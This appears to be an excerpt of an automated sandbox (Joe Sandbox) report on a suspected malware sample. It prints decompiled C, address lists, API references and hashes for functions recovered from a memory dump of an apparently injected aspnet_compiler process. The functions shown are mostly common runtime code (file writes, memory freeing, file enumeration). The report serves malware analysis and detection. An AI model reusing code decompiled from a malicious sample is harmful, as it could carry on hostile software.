				_t24 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19);
				if(_t24 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
						if(WriteFile(_t24, _t25, _t23,  &_v4, _t19) != 0) {
							_t19 = 1;
						}
						CloseHandle(_t24);
						return _t19;
					} else {
						CloseHandle(_t24);
						goto L6;
					}
				} else {
					L6:
					return 0;
				}
			}












                    0x0041ad72
                    0x0041ad74
                    0x0041ad77
                    0x0041ad79
                    0x0041ad7b
                    0x0041ad95
                    0x0041ad9a
                    0x0041ad7d
                    0x0041ad80
                    0x0041ad89
                    0x0041ad8d
                    0x0041ad82
                    0x0041ad84
                    0x0041ad85
                    0x0041ad85
                    0x0041ad80
                    0x0041adaf
                    0x0041adb4
                    0x0041adbf
                    0x0041adeb
                    0x0041aded
                    0x0041aded
                    0x0041adf0
                    0x00000000
                    0x0041add1
                    0x0041add2
                    0x00000000
                    0x0041add2
                    0x0041adb6
                    0x0041adb6
                    0x00000000
                    0x0041adb6

                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041AE89,00000000,00000000,?), ref: 0041ADA9
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00409E5A,?,00000000,00000000), ref: 0041ADC6
                    • CloseHandle.KERNEL32(00000000,?,00409E5A,?,00000000,00000000), ref: 0041ADD2
                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409E5A,?,00000000,00000000), ref: 0041ADE3
                    • CloseHandle.KERNEL32(00000000,?,00409E5A,?,00000000,00000000), ref: 0041ADF0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID:
                    • API String ID: 1852769593-0
                    • Opcode ID: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                    • Instruction ID: 53714e6fa216203b7318fdbd75d04b9937c0d47cb555b8ec8e0bf6eb367397e8
                    • Opcode Fuzzy Hash: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                    • Instruction Fuzzy Hash: CE110871206A117FE6104A24BC88EFB779EEB42367F10463AF552C26D0C634CC86563F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00446B19 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E00446B19(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46f1dc; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E004443F4(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00447092(_t13, _t16, __eflags,  *0x46f1dc, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00446907(_t13, _t15, 0x470664);
							E00445002(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00445002();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0044703C(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                    0x00446b19
                    0x00446b24
                    0x00446b26
                    0x00446b28
                    0x00446b2d
                    0x00446b30
                    0x00446b3e
                    0x00446b4a
                    0x00446b4d
                    0x00446b50
                    0x00446b62
                    0x00446b67
                    0x00446b69
                    0x00446b74
                    0x00446b7a
                    0x00446b82
                    0x00446b84
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446b6b
                    0x00446b6b
                    0x00000000
                    0x00446b6b
                    0x00446b52
                    0x00446b52
                    0x00446b53
                    0x00446b53
                    0x00446b86
                    0x00446b87
                    0x00446b87
                    0x00446b32
                    0x00446b38
                    0x00446b3c
                    0x00446b8f
                    0x00446b90
                    0x00446b96
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446b3c
                    0x00446b9d

                    APIs
                    • GetLastError.KERNEL32(?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00446B1E
                    • _free.LIBCMT ref: 00446B53
                    • _free.LIBCMT ref: 00446B7A
                    • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B87
                    • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B90
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                    • Instruction ID: 0346a1b294bc514b0a994de80f7e6f12b46350d74b5091e52828a709d6f7ce0e
                    • Opcode Fuzzy Hash: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                    • Instruction Fuzzy Hash: B6012676205B506BB7112629BC45D6F2269CBD37B9722003BF409D32C2EE7CDC06416F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044F23C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0044F23C(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46f188; // 0x46f180
					if(_t23 != 0) {
						E00445002(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46f18c; // 0x47065c
					if(_t24 != 0) {
						E00445002(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46f190; // 0x47065c
					if(_t25 != 0) {
						E00445002(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46f1b8; // 0x46f184
					if(_t26 != 0) {
						E00445002(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46f1bc; // 0x470660
					if(_t27 != 0) {
						return E00445002(_t6);
					}
				}
				return _t6;
			}










                    0x0044f242
                    0x0044f247
                    0x0044f24b
                    0x0044f251
                    0x0044f254
                    0x0044f259
                    0x0044f25d
                    0x0044f263
                    0x0044f266
                    0x0044f26b
                    0x0044f26f
                    0x0044f275
                    0x0044f278
                    0x0044f27d
                    0x0044f281
                    0x0044f287
                    0x0044f28a
                    0x0044f28f
                    0x0044f290
                    0x0044f293
                    0x0044f299
                    0x00000000
                    0x0044f2a1
                    0x0044f299
                    0x0044f2a4

                    APIs
                    • _free.LIBCMT ref: 0044F254
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 0044F266
                    • _free.LIBCMT ref: 0044F278
                    • _free.LIBCMT ref: 0044F28A
                    • _free.LIBCMT ref: 0044F29C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                    • Instruction ID: f954284d0b45cb36624272f64f50ef8c725a3c78d63bb55929d804f861096251
                    • Opcode Fuzzy Hash: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                    • Instruction Fuzzy Hash: A3F09676504601EBEA30EB69F983C4B73D9BA05B54354487BF048D7641C7B9FC844AAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00442968 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00442968(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46f9a0; // 0xeda200
					if(_t7 != 0x46f780) {
						E00445002(_t7);
						 *0x46f9a0 = 0x46f780;
					}
				}
				E00445002( *0x470a18);
				 *0x470a18 = 0;
				E00445002( *0x470a1c);
				 *0x470a1c = 0;
				E00445002( *0x470a48);
				 *0x470a48 = 0;
				E00445002( *0x470a4c);
				 *0x470a4c = 0;
				return 1;
			}




                    0x00442971
                    0x00442975
                    0x00442977
                    0x00442983
                    0x00442986
                    0x0044298c
                    0x0044298c
                    0x00442983
                    0x00442998
                    0x004429a5
                    0x004429ab
                    0x004429b6
                    0x004429bc
                    0x004429c7
                    0x004429cd
                    0x004429d5
                    0x004429de

                    APIs
                    • _free.LIBCMT ref: 00442986
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 00442998
                    • _free.LIBCMT ref: 004429AB
                    • _free.LIBCMT ref: 004429BC
                    • _free.LIBCMT ref: 004429CD
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                    • Instruction ID: ac8127230bc54366d86f294ef586a91d245084804c15bedb181f71e342f475e2
                    • Opcode Fuzzy Hash: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                    • Instruction Fuzzy Hash: 30F0D0B9902721DBDB51AF19FC428093760A724B24781913BF45C56B71D77909858FCE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044CF69 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E0044CF69(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00441F9E(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00440303(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043A5E8();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E004443F4(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00440303(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0044D338(_a12, __eflags, _t213);
													E00445002(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00440303(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043A5E8();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46f00c; // 0x54ba778e
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00454B80(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00435760(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0043F8D0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044CF51);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E004338BB(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00445002(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00454B40( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0044D313( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0043EEAD();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043A5BB();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                    0x0044cf6e
                    0x0044cf71
                    0x0044cf77
                    0x0044cf8f
                    0x0044cf92
                    0x0044cf96
                    0x0044cf98
                    0x0044cf9a
                    0x0044cf9c
                    0x0044cf9f
                    0x0044cfa2
                    0x0044cfa5
                    0x0044cfa7
                    0x0044cfff
                    0x0044cfff
                    0x0044d005
                    0x0044d007
                    0x0044d012
                    0x0044d016
                    0x0044d018
                    0x0044d01b
                    0x0044d01f
                    0x0044d01f
                    0x0044d021
                    0x0044d023
                    0x0044d025
                    0x0044d027
                    0x0044d027
                    0x0044d029
                    0x0044d02c
                    0x0044d02f
                    0x0044d02f
                    0x0044d031
                    0x0044d032
                    0x0044d032
                    0x0044d03d
                    0x0044d03f
                    0x0044d042
                    0x0044d043
                    0x0044d046
                    0x0044d046
                    0x0044d04a
                    0x0044d04d
                    0x0044d050
                    0x0044d050
                    0x0044d05e
                    0x0044d060
                    0x0044d063
                    0x0044d065
                    0x0044d06f
                    0x0044d072
                    0x0044d075
                    0x0044d077
                    0x0044d07a
                    0x0044d07c
                    0x0044d0cc
                    0x0044d0cf
                    0x0044d0cf
                    0x0044d0d1
                    0x00000000
                    0x0044d07e
                    0x0044d080
                    0x0044d080
                    0x0044d082
                    0x0044d085
                    0x0044d085
                    0x0044d08a
                    0x0044d08d
                    0x0044d08d
                    0x0044d08f
                    0x0044d090
                    0x0044d090
                    0x0044d094
                    0x0044d097
                    0x0044d097
                    0x0044d09a
                    0x0044d09d
                    0x0044d0aa
                    0x0044d0af
                    0x0044d0b2
                    0x0044d0b4
                    0x0044d0ee
                    0x0044d0ef
                    0x0044d0f0
                    0x0044d0f1
                    0x0044d0f2
                    0x0044d0f3
                    0x0044d0f8
                    0x0044d0fc
                    0x0044d0fe
                    0x0044d0ff
                    0x0044d102
                    0x0044d102
                    0x0044d105
                    0x0044d105
                    0x0044d107
                    0x0044d108
                    0x0044d108
                    0x0044d111
                    0x0044d112
                    0x0044d115
                    0x0044d118
                    0x0044d11b
                    0x0044d11d
                    0x0044d124
                    0x0044d126
                    0x0044d129
                    0x0044d133
                    0x0044d136
                    0x0044d137
                    0x0044d139
                    0x0044d14d
                    0x0044d14d
                    0x0044d150
                    0x0044d15a
                    0x0044d15f
                    0x0044d162
                    0x0044d164
                    0x00000000
                    0x0044d166
                    0x0044d16a
                    0x0044d173
                    0x0044d179
                    0x00000000
                    0x0044d17c
                    0x0044d13b
                    0x0044d13b
                    0x0044d141
                    0x0044d146
                    0x0044d149
                    0x0044d14b
                    0x0044d182
                    0x0044d184
                    0x0044d185
                    0x0044d186
                    0x0044d187
                    0x0044d188
                    0x0044d189
                    0x0044d18e
                    0x0044d191
                    0x0044d192
                    0x0044d194
                    0x0044d19a
                    0x0044d1a1
                    0x0044d1a4
                    0x0044d1a7
                    0x0044d1a8
                    0x0044d1ab
                    0x0044d1ac
                    0x0044d1af
                    0x0044d1b0
                    0x0044d1d1
                    0x0044d1d1
                    0x0044d1d3
                    0x00000000
                    0x00000000
                    0x0044d1b8
                    0x0044d1ba
                    0x0044d1bc
                    0x0044d1be
                    0x0044d1c0
                    0x0044d1c2
                    0x0044d1c4
                    0x0044d1cf
                    0x00000000
                    0x0044d1cf
                    0x0044d1c4
                    0x0044d1c0
                    0x00000000
                    0x0044d1bc
                    0x0044d1d5
                    0x0044d1d7
                    0x0044d1da
                    0x0044d1f3
                    0x0044d1f3
                    0x0044d1f5
                    0x0044d1f8
                    0x0044d208
                    0x0044d20a
                    0x0044d20a
                    0x0044d1fa
                    0x0044d1fa
                    0x0044d1fd
                    0x00000000
                    0x0044d1ff
                    0x0044d1ff
                    0x0044d202
                    0x00000000
                    0x0044d204
                    0x0044d204
                    0x0044d204
                    0x0044d202
                    0x0044d1fd
                    0x0044d218
                    0x0044d21c
                    0x0044d22a
                    0x0044d22f
                    0x0044d244
                    0x0044d246
                    0x0044d24c
                    0x0044d24f
                    0x0044d281
                    0x0044d281
                    0x0044d286
                    0x0044d28c
                    0x0044d28c
                    0x0044d293
                    0x0044d2ad
                    0x0044d2ad
                    0x0044d2ae
                    0x0044d2b4
                    0x0044d2ba
                    0x0044d2bb
                    0x0044d2bc
                    0x0044d2c1
                    0x0044d2c4
                    0x0044d2c6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d295
                    0x0044d295
                    0x0044d29b
                    0x0044d29d
                    0x00000000
                    0x0044d29f
                    0x0044d29f
                    0x0044d2a2
                    0x00000000
                    0x0044d2a4
                    0x0044d2a4
                    0x0044d2ab
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d2ab
                    0x0044d2a2
                    0x0044d29d
                    0x00000000
                    0x0044d2c8
                    0x0044d2d0
                    0x0044d2d6
                    0x0044d2d8
                    0x0044d2d8
                    0x0044d2e0
                    0x0044d2e5
                    0x0044d2ed
                    0x0044d2f0
                    0x0044d2f2
                    0x0044d306
                    0x0044d30b
                    0x0044d251
                    0x0044d251
                    0x0044d252
                    0x0044d253
                    0x0044d254
                    0x0044d255
                    0x0044d25d
                    0x0044d25d
                    0x0044d25d
                    0x0044d25f
                    0x0044d262
                    0x0044d265
                    0x0044d265
                    0x0044d1dc
                    0x0044d1df
                    0x0044d1e1
                    0x00000000
                    0x0044d1e3
                    0x0044d1e3
                    0x0044d1e6
                    0x0044d1e7
                    0x0044d1e8
                    0x0044d1e9
                    0x0044d1ee
                    0x0044d1e1
                    0x0044d26d
                    0x0044d272
                    0x0044d27d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d14b
                    0x0044d11f
                    0x0044d121
                    0x0044d17d
                    0x0044d181
                    0x0044d181
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044d0b6
                    0x0044d0b9
                    0x0044d0bc
                    0x0044d0bf
                    0x0044d0c2
                    0x0044d0c5
                    0x0044d0c8
                    0x0044d0c8
                    0x00000000
                    0x0044d085
                    0x0044d067
                    0x0044d067
                    0x0044d0d3
                    0x0044d0d5
                    0x00000000
                    0x0044d0da
                    0x0044cfa9
                    0x0044cfa9
                    0x0044cfac
                    0x0044cfb5
                    0x0044cfb8
                    0x0044cfbf
                    0x0044cfc1
                    0x0044cfda
                    0x0044cfdb
                    0x0044cfdc
                    0x0044cfde
                    0x0044cfe3
                    0x0044cfc3
                    0x0044cfc3
                    0x0044cfc6
                    0x0044cfc7
                    0x0044cfc9
                    0x0044cfcb
                    0x0044cfcd
                    0x0044cfd2
                    0x0044cfd2
                    0x0044cfe6
                    0x0044cfe8
                    0x0044cfea
                    0x00000000
                    0x00000000
                    0x0044cff0
                    0x0044cff3
                    0x0044cff5
                    0x0044cff7
                    0x00000000
                    0x0044cff9
                    0x0044cff9
                    0x0044cffc
                    0x00000000
                    0x0044cffc
                    0x00000000
                    0x0044cff7
                    0x0044d0db
                    0x0044d0de
                    0x0044d0e3
                    0x00000000
                    0x0044d0e6
                    0x0044cf79
                    0x0044cf79
                    0x0044cf80
                    0x0044cf81
                    0x0044cf83
                    0x0044cf88
                    0x0044d0e7
                    0x0044d0eb
                    0x0044d0eb
                    0x00000000

                    APIs
                    • _strpbrk.LIBCMT ref: 0044CFB8
                    • _free.LIBCMT ref: 0044D0D5
                      • Part of subcall function 0043A5E8: IsProcessorFeaturePresent.KERNEL32(00000017,0043A5BA,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000), ref: 0043A5EA
                      • Part of subcall function 0043A5E8: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 0043A60C
                      • Part of subcall function 0043A5E8: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 0043A613
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
